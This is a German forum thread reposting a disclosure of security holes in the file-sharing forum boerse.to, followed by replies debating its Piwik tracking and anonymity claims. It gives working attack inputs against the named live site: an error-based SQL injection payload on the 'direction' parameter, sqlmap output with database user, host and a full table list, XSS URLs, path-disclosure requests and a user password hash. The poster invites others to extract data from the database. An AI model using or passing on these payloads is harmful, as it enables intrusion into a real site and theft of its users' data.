boerse.to hacked by 404 + cyber agent | hinter den kulissen

      boerse.to hacked by 404 + cyber agent | hinter den kulissen

      originalmeldung aus toolbase:

      hatte das forum mit cyber agent gebügelt.
      naja irgend ein idiot hats ausm 2nd geleaked, gestern aufeinmal alles fixed, damit ist die deutsche hacking szene für mich gestorben.

      eventuell ist ja noch irgendwas von den lücken gültig, hab keine zeit das nochmal alles zu testen, deswegen publiziere ich hier einmalig.




      :: VORWORT ::

      eigentlich wollte ich hier nix relevantes mehr posten (aufgrund einiger personen die meinten inhalte zu leaken und inhaber auf hier gepostete lücken hinweißen zu müssen #fraud).
      meine letzen beiträge hier im 2nd haben sich dementsprechend auch eher um meinungsäußerung und talk gedreht.

      nunja, bekomme ich irgendwie mit das die details dieses threads anklang in der öffentlichkeit oder auf anderen foren (ohne meine zustimmung) finden, bitte ich yakuza meinen nutzeraccount zu entfernen! denn meiner meinung nach basiert eine 2nd gemeinschaft auf vertrauen und erfahrenen leuten.

      :: NON LOGGING ::

      kommen wir nun zu dieser neuen boerse.to, welche fett mit anonymität und "der user ist bei uns absolut sicher" wirbt und sogar stichworte wie "wir speichern nicht" in ankündigungen vergewaltigt.

      warum liebe boerse.to administration gibt es dann die subdomain:

      Quellcode

      1. [url]https://stats.boerse.to[/url]

      inklusive installiertem:
      Piwik 2.7.0

      Quellcode

      1. [url]https://stats.boerse.to/piwik/[/url]

      danke nochmal an das bebrutebare login und die fpd :good:

      Quellcode

      1. Notice: Array to string conversion in /var/www/stats/piwik/libs/HTML/Common2.php on line 251




      ich hab mir selbst mal piwik angeguckt und es ist das glaube ich beste kostenlose tracing script was ich kenne. zeichnet alles auf von A bis X, man kann filtern, vergleichen und und und. die versprochene anonymität, eine illusion!

      :: SICHERE SERVER, SICHERES FORUM::

      wird eine private Boerse.to Cloud entstehen, die unsere Verfügbarkeit und Sicherheit garantiert


      es gab ja schon genug spekulationen über die angebliche cloud und die server und wer ist techniker und wer steckt dahinter und mr.nice besorgt die serverlein. aber würde mr.nice servertechnisch am hebel sitzen wäre boerse.to kein sieb was lücken und errors angeht!

      SQL Injection / error-based / zend db :fuuu:

      Quellcode

      1. https://boerse.to/forum/einsteiger.116/ | direction='





      Quellcode

      1. dbuser = xenboerse@[member='10minutenhacker'].129.174.45 (systemuser)
      2. dbname = xenboerse <-- wie ausgeklügelt.. xen(foro)boerse
      3. dbversion = 5.6.20-68.0-log
      4. path = /var/lib/mysql
      5. hostname = mysql.backend


      Cross Site Scripting

      Quellcode

      1. https://boerse.to/forum/einsteiger.116/ | direction=1"><script>alert(404)</script>



      Quellcode

      1. https://cdn.boerse.to/%3Cscript%3Ealert(404)%3C/script%3E



      Full Path Disclosure

      Quellcode

      1. Cookie: bto_session[]




      Quellcode

      1. https://boerse.to/members/404/ | message=&return=&_xfNoRedirect=&_xfRequestUri[]=&_xfResponseType=json&_xfToken=



      Admin Directory

      https://boerse.to/admin.php !NO WAY
      Boerse.to - Anmeldung für die Administration | Admin CP - Boerse.to SRSLY?!

      Error Playground :clapping:
      1ee56a.jpg
      263e96.jpg
      3.jpg

      joar, das wars soweit mit dem verein.
      sqli hat ne zeichenbeschränkung von 21 chars. via substring lässt sich alles auslesen also have phun ;>


      greetz

      bitte nicht mit autoinjectern/scannern an die sache!!!
      boerse.to schiebt errors:

      Boerse.to

      Quellcode

      1. An exception occurred: Too many connections in /var/www/boerse/library/Zend/Db/Adapter/Mysqli.php on line 333


      leaked pathes, denke mal die bügeln jetzt um.

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von „pr0st“ ()

      404 hat mir noch ein log nachgereicht, der alle tabellen der boerse.to datenbank beinhaltet: interessant sind die plugins welche installiert wurden (rot makiert)
      zb: Conversation Essentials | XenForo Community

      anonymität von wegen..

      sqlmap identified the following injection points with a total of 99 HTTP(s) requests:
      ---
      Place: POST
      Parameter: direction
      Type: error-based
      Title: MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)
      Payload: direction=,EXTRACTVALUE(3929,CONCAT(0x5c,0x7171646c71,(SELECT (CASE WHEN (3929=3929) THEN 1 ELSE 0 END)),0x7178667471))
      ---
      back-end DBMS: MySQL >= 5.0.0
      Database: xenboerse
      [157 tables]
      +-----------------------+
      | convess |
      | convess_auto_response |
      | convess_group |
      | convess_group_user |
      | convess_message_likes |
      | convess_prefix |
      | convess_user_options |
      | dp_spy |
      | fh_twofactor |
      | fh_twofactor_key |
      | fh_twofactor_trusted |
      | modess_modlog_search |
      | sf_stopbotters |
      | sf_stopproxies |
      | sticky_thread_order |
      | tr_rating |
      | tr_thread_rate |
      | useress_thread_lock |
      | useress_unc |
      | useress_unc_cron |
      | useress_user_log |
      | xf_addon |
      | xf_admin |
      | xf_admin_log |
      | xf_admin_navigation |
      | xf_admin_permission |
      | xf_admin_search_type |
      | xf_admin_template |
      | xf_attachment |
      | xf_attachment_data |
      | xf_attachment_view |
      | xf_ban_email |
      | xf_bb_code |
      | xf_bb_code_media_site |
      | xf_brivium_addon |
      | xf_captcha_log |
      | xf_captcha_question |
      | xf_code_event |
      | xf_content_spam_cache |
      | xf_content_type |
      | xf_content_type_field |
      | xf_conversation_user |
      | xf_cron_entry |
      | xf_data_registry |
      | xf_deferred |
      | xf_deletion_log |
      | xf_draft |
      | xf_edit_history |
      | xf_email_bounce_log |
      | xf_email_bounce_soft |
      | xf_email_template |
      | xf_error_log |
      | xf_es_search_failed |
      | xf_feed |
      | xf_feed_log |
      | xf_flood_check |
      | xf_forum |
      | xf_forum_prefix |
      | xf_forum_read |
      | xf_forum_watch |
      | xf_help_page |
      | xf_image_proxy |
      | xf_import_log |
      | xf_ip |
      | xf_ip_match |
      | xf_language |
      | xf_liked_content |
      | xf_link_forum |
      | xf_link_proxy |
      | xf_login_attempt |
      | xf_mail_queue |
      | xf_moderation_queue |
      | xf_moderator |
      | xf_moderator_content |
      | xf_moderator_log |
      | xf_news_feed |
      | xf_node |
      | xf_node_type |
      | xf_notice |
      | xf_notice_dismissed |
      | xf_option |
      | xf_option_group |
      | xf_page |
      | xf_permission |
      | xf_permission_entry |
      | xf_permission_group |
      | xf_phrase |
      | xf_phrase_compiled |
      | xf_phrase_map |
      | xf_poll |
      | xf_poll_response |
      | xf_poll_vote |
      | xf_post |
      | xf_post_comments |
      | xf_profile_post |
      | xf_profile_visitors |
      | xf_report |
      | xf_report_comment |
      | xf_route_filter |
      | xf_route_prefix |
      | xf_search |
      | xf_search_index |
      | xf_session |
      | xf_session_activity |
      | xf_session_admin |
      | xf_sitemap |
      | xf_smilie |
      | xf_smilie_category |
      | xf_spam_cleaner_log |
      | xf_spam_trigger_log |
      | xf_stats_daily |
      | xf_style |
      | xf_style_property |
      | xf_template |
      | xf_template_compiled |
      | xf_template_history |
      | xf_template_include |
      | xf_template_map |
      | xf_template_phrase |
      | xf_thread |
      | xf_thread_prefix |
      | xf_thread_read |
      | xf_thread_redirect |
      | xf_thread_reply_ban |
      | xf_thread_user_post |
      | xf_thread_view |
      | xf_thread_watch |
      | xf_trophy |
      | xf_upgrade_log |
      | xf_upload_template |
      | xf_user |
      | xf_user_alert |
      | xf_user_alert_optout |
      | xf_user_authenticate |
      | xf_user_ban |
      | xf_user_change_log |
      | xf_user_change_temp |
      | xf_user_confirmation |
      | xf_user_external_auth |
      | xf_user_field |
      | xf_user_field_value |
      | xf_user_follow |
      | xf_user_group |
      | xf_user_group_change |
      | xf_user_ignored |
      | xf_user_option |
      | xf_user_privacy |
      | xf_user_profile |
      | xf_user_status |
      | xf_user_title_ladder |
      | xf_user_trophy |
      | xf_user_upgrade |
      | xf_user_upgrade_log |
      | xf_warning |
      | xf_warning_action |
      | xf_warning_definition |
      | xf_widget |
      +-----------------------+

      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
      ---
      Place: POST
      Parameter: direction
      Type: error-based
      Title: MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)
      Payload: direction=,EXTRACTVALUE(3929,CONCAT(0x5c,0x7171646c71,(SELECT (CASE WHEN (3929=3929) THEN 1 ELSE 0 END)),0x7178667471))
      ---
      back-end DBMS: MySQL >= 5.0.0
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
      ---
      Place: POST
      Parameter: direction
      Type: error-based
      Title: MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)
      Payload: direction=,EXTRACTVALUE(3929,CONCAT(0x5c,0x7171646c71,(SELECT (CASE WHEN (3929=3929) THEN 1 ELSE 0 END)),0x7178667471))
      ---
      back-end DBMS: MySQL >= 5.0.0


      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von „pr0st“ ()

      Nun Lars hat das Problem teilweise auch wegen Spiegelbest. Er selbst macht aber auch nicht mehr so qualitative News, immerhin einfach einen Thread herzunehmen ohne Dinge nachzuprüfen (denn wie gesagt waren die Sachen schon bekannt) zeigt von einer gewissen Unprofessionalität. Bevorzugt lese ich nur Annikas Beiträge, weil diese wirklich fundiert sind (leider aber auch selten).

      absolut peinlich wie die moderation auf das thema reagiert. wie ein kleinkind wird alles totgeschwiegen, abgestritten und dagegen argumentiert.
      piwik speichert natürlich alles außer IP Adresse. ACH NATÜRLICH !!! wie soll denn die software einzelnde user identifizieren, wenn nicht an der verdammten ip adresse?

      liebe boerse.to administration es wäre doch hilfreich würde man die plugins und tools die man installiert selbst verstehen, das gleiche gilt für die server einrichtung.
      wenn das so weitergeht, finden halt teile der datenbank ihren weg in die öffentlichkeit.



      Argl passwort:

      Quellcode

      1. sha1(sha1(password) . salt) oder sha256(sha256(password) . salt)

      Quellcode

      1. a:1:{s:4:"hash";s:60:"$2a$10$KxxN24kOU1UdJoAJkOo0Heb89JPKV.CDp.vlU47FEu.61cph1jhvO";}

      Im Text steht, dass die IPs etc nicht mitgespeichert werden, nicht, dass das nicht möglich wäre (man kann Dinge deaktivieren bzw. einen Workaround schreiben). Software wird über den Useragent nicht über die IP erkannt. Auch wenn der Text oft "arrogant" verfasst ist, so haben sie bis jetzt zumindest nicht gelogen (bezüglich der SQL-Injectionmöglichkeit haben sie sich nicht geäußert, es aber auch nicht abgestritten).

      Man muss also widerlegen, dass sie diese Daten nicht tilgen und nicht darauf rumreiten, dass sie Piwik verwenden und der Beweis wurde von keinen Seiten bis jetzt erbracht. Hier muss man (bis jetzt) das glauben was gesagt wird.

      P.S.: Wenn man sich Xenoforo lädt kann man natürlich nachsehen wie die PWs verschlüsselt bzw. gehasht werden (ist bei jedem Foren-CMS etc. möglich). Somit ist die Ausgabe im Quellcode für mich immer noch nichts fundiertes, immerhin kann dieser Code auch abgeändert worden sein, oder möchte man damit aussagen man hätte Zugriff auf die PHP-Dateien.

      Wie "alt" die Herren und User von b.to sind, zeigt ja schon, dass sie zu blöd sind, zum lesen. Lars hat klar in seiner News auf SB und sogar auf diesen Thread verlinkt, aber bei b.to hacken sie auf Lars rum? Aaahja.

      Am Ende hat sich null geändert. B.to wird weiterhin von den gleichen Vogel/Vögeln betrieben und verwaltet, wie b.bz.
      Ich würde sogar fast wetten, dass es dort wieder 666 Sammelthreads von allen Mods dort gibt! Somit auch da das gleiche Spiel wie vorher ^^
      :clap: IntelliTool | Auto Upload Bot :clap:

      Auf Wikipedia fällt so ein sagenhafter 'Kritik an Piwik' Thread in die Kategorie "Kognitive Dissonanz".

      Eigentlich müßten sie kotzen, weil Sicherheit und Anonymität wohl ein Griff ins Klo waren, und dann auch noch wg. Inkompetenz, und peinlicher wirds vielleicht auch noch?!
      Um zu sagen, hey wir fixen die Lücken und Userdaten werden schon/künftig maskiert, gestrippt, gefaked, ect pp (per Piwik anonIP plugin o.ä), wie es andere Betreiber mit Logs/Daten & Analysetools ja auch machen und mitteilen, müßte man lt. @pr0st aber wissen, was man da tut; wie doof.

      Zum Glück können die User Piwik ja abstellen, und Lars ist mal richtig scheiße, und überhaupt wem die Freibörse mit seinem Wachtteam nicht gefällt.., und schon ist das Kotzgefühl auch weg, mal sehen wie lange.

      ps: das das alte zu Hause derweilen zur unmoderierten Virenschleuder verkommt, sei dabei nur mal am Rande erwähnt.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Tom4“ ()

      pr0st schrieb:


      Argl passwort:

      Quellcode

      1. sha1(sha1(password) . salt) oder sha256(sha256(password) . salt)

      Quellcode

      1. a:1:{s:4:"hash";s:60:"$2a$10$KxxN24kOU1UdJoAJkOo0Heb89JPKV.CDp.vlU47FEu.61cph1jhvO";}


      Zur Information für Leute die diesen Hash gern cracken wollen:
      Die Hashes werden in bcrypt (Blowfish) gespeichert.
      Diese zu cracken ist selbst mit einer Dictionary-Attack die reinste Zeitverschwendung, wenn man nicht gerade gute Hardware (eine schnelle GPU) zur verfügung hat.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Cyber-Agent“ ()